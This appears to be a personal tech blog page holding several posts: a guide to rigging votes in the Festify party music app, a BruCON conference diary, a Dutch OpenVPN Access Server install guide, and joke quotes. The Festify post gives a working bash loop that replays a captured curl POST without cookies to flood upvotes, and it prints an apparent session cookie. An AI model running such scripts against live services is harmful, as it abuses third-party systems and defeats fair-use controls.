This is why can’t have nice things! // Hack the party

Recently we started using Festify at our Student fraternity Gumbo Millennium. Festify is a really cool app that you can use to let your guests choose what songs they want to hear and prevents a lot of discussion about “what to play next”.

Festify is a free Spotify-powered app that lets your guests choose which music should be played using their smartphones.

But democracy doesn’t work when you want to hear your favourite song!

screen-shot-2016-09-13-at-08-45-03Step 1 – Setup and installation

Festify is really easy to install. You just need the software, Spotify and a Spotify Premium account. After that you can invite guests to the party or they can go to festify.us and enter the party ID.

Step 2 – Adding that funky jam

After joining a party you can add songs and vote on songs other people have edited. See them rise to the top and hope that your song hits the dance floor! Festify doesn’t require registration to vote and this is where the fun starts! Festify uses cookies to register your vote and prevents you from forcing your music on other people. Cookies? Let’s get started!

Step 3 – Capturing the upvote

After adding a song to the que you can’t vote on it. But thats easily solved. Delete you cookies, hard refresh and then you’re able to up-vote a song you just added. Using Chrome Developer tools you’re able to capture the POST request that up votes the song.

screen-shot-2016-09-13-at-08-57-58

After coping this as a cURL request we get:

curl 'http://festify.us/api/parties/57d58ed9a27km0a6640ve8ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d58ed9a27km0a6640ve8ec' -H 'Cookie: _ga=GA1.2.1227056308.1473749685; _gat=1; connect.sid=s%3AplGQJeKPXu4gzDbLG4PokrG55TKBtBfF.5xiePNNfCVCO7e2KTQ5DW9meQOy81CRdNd26o%2Bvdyu4' -H 'Connection: keep-alive' --data-binary $'{"name":"I\'m Too Sexy","spotifyID":"2WElktskrNJEwgpp5Vouxk"}' --compressed

Step 4 – Edit the vote and fire the lazer

After capturing it’s easy to remove the cookie in the cURL request

'Cookie: _ga=GA1.2.1227056308.1473749685; _gat=1; connect.sid=s%3AplGQJeKPXu4gzDbLG4PokrG55TKBtBfF.5xiePNNfCVCO7e2KTQ5DW9meQOy81CRdNd26o%2Bvdyu4'

And put it in a script

#!/bin/bash
x=1
while [ $x -le 99 ]
do
  echo "Up-voted $x times"

    curl 'http://festify.us/api/parties/57d16e88a27dd0a66ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d16e88a27dd0a66ec'  -H 'Connection: keep-alive' --data-binary '{"name":"Afro Circus/I Like To Move It","spotifyID":"0qNBowxGCvy2mSbg9kmEua"}' --compressed

  x=$(( $x + 1 ))
done

echo "AFRO"

picard-full-of-win1-e1309226314822

Thank you Roelof for making this possible.

#10958 +(9086)- [X]
(morganj): 0 is false and 1 is true, correct?
(alec_eso): 1, morganj
(morganj): bastard.

My first #BruCON — Hackers & B33R

 

IMG_7764So let’s talk BruCON. After weeks of convincing my friend Floyd finally talked me in to going to BruCON with him. Me never having been to a ‘real’ hackers conference did not know what to expect.

 

The Journey 

Me and Floyd decided to take it easy. We only had to take the train to Gent. What could go wrong? Well, after finishing How to Train your Dragon 2 on the iPad we quickly discovered we were actually sitting in the wrong train. No biggy just a 1,5 hour delay. A lot of people had it worse:

 

The Arival After a short discusion on witch train to take we where on the road again. And IMG_6235it did nog take us long to arrive in Gent. The first thing I did when we arrived at our lovely AirBNB adres was of course back-upping my system, applying the latest patches and checking if my VPN was running as well as I hoped. We (of course) weren’t the first arrivals. As I gasped at the building the conference was being held in (lots of photos in this post) we checked in and met some of the arrivals. A few beers and good conversations later we hit the bar, and soon after that our beds.

Tha first day Having had a goodnight of sleep at the AirBNB (btw what’s up with locks in Belgium, nothing had a lock, not the toilet or the shower) we went back to the con. After a quick intro keynote we discovered the hacking challenge hosted by NVISO. Soon every table was filed with hackers trying to solve the different challenges. Floyd also introduced me to my first taste of Club Mate and we became instant BFF’s.

The talks on the first day where a lot of fun. I went to Exploiting the Bells and Whistles: Uncovering OEM Vulnerabilities in Android (part 1). It was all about exploiting android. Just wish I could have run the VM’s (vBox an VM ware images don’t play nice). I also attended the beer workshop where we learned all about making beer (and what not to do unless you want your bottles to explode). After a few ( free ) beers at the worksop it was time to hit the afterparty and bars.

 

 

IMG_6282After a ‘successful’ night of consuming various drinks and moving one’s body to strange music we went back to a short night of sleep. After we woke up we soon discovered ( while Floyd was still taking his shower ) that the builders outside thought that this was a perfect time to close the central water supply.

 

Day 2 time

The second day we attended a few talks. One about Building your own botnet, about Thunderbolt DMA attacks and honeypot’s. Day 2 was over so quick. I’m not sure it was because of the hangover or all the cool talks and workshops I was attending.

IMG_7760

Closing and final thoughts

My first BruCON was amazing. There is so much I haven’t written about because you can’t explain it without proper context. There were so many amazing people, and it’s just hilarious to discus your worst IT screwup wile being drunk outside a bar at 5 in the morning. I’ll be going back next year and in the meantime I will be on the lookout for more Cons.

And to close this post, here are some ( as we call them in Holland ) “Sfeer Foto’s” of Gent and the BruCON.

@securitygen: I received a Tor joke from someone. have no idea who they are though.

OpenVPN server in 30Seconden – HowTo

Vandaag gaan wij een OpenVPN server bakken.

Screenshot 2014-05-26 13.01.06

NOTE: We maken hier gebruik van de OpenVPN acces server. Dit is een stukje software van OpenVPN met een aantal beperkingen ( je kan bijvoorbeeld maar 2 geregistreerde gebruikers tegelijk met je server laten praten, je kan echter wel 1 account op meerdere apparaten tegelijk gebruiken  ).

Voor iedereen die niet weet wat een VPN doet:

Een VPN is een netwerk dat door een ander netwerk (gewoonlijk het internet)[1] getunneld wordt. Hierdoor wordt de theoretische topologievereenvoudigd, de praktische routering daarentegen zal complexer worden afhankelijk van het onderliggende netwerk. Een VPN tracht de voordelen van het onderliggende netwerk te gebruiken en de nadelen ervan te compenseren. De primaire problemen met het datatransport over een onderliggend netwerk zijn de veiligheid en de betrouwbaarheid. Door encryptie en controlemaatregelen (bijvoorbeeld CRC) kan een goed uitgewerkt VPN toch deintegriteitautorisatie en authenticiteit van de verzonden data verzorgen. Al deze beveiligingsmaatregelen moeten bovendien zo transparant mogelijk geïmplementeerd worden, opdat de eindgebruikers er eenvoudig gebruik van kunnen maken. Verder moet er ook rekening gehouden worden met wetten[2] die van kracht zijn omtrent de privacy van data.

Ingrediënten: 

  • VPS of thuisserver met een Linux Smaakje
  • 30 seconden van je leven ( meer als je het niet helemaal snapt )

Stap voor Stap

1. Log in op je server.

2. Wget deze shizzl van OpenVPN:

32 bit: wget http://swupdate.openvpn.org/as/openvpn-as-1.8.5-Debian6.i386.deb

64 bit: wget http://swupdate.openvpn.org/as/openvpn-as-1.8.5-Debian6.amd_64.deb

3. Installeren:

32 bit: dpkg -i openvpn-as-1.8.5-Debian6.i386.deb
64 bit: dpkg -i openvpn-as-1.8.5-Debian6.amd_64.deb

4: To the Web interface:

https://ipadressvanjeserver/admin

Screenshot 2014-05-26 13.00.48

En dat is het eigenlijk. Veel plezier met je VPN. Doe maar vragen stellen in de comments.

@longstag "Time to laugh exceeded!!!" #TTL #protolol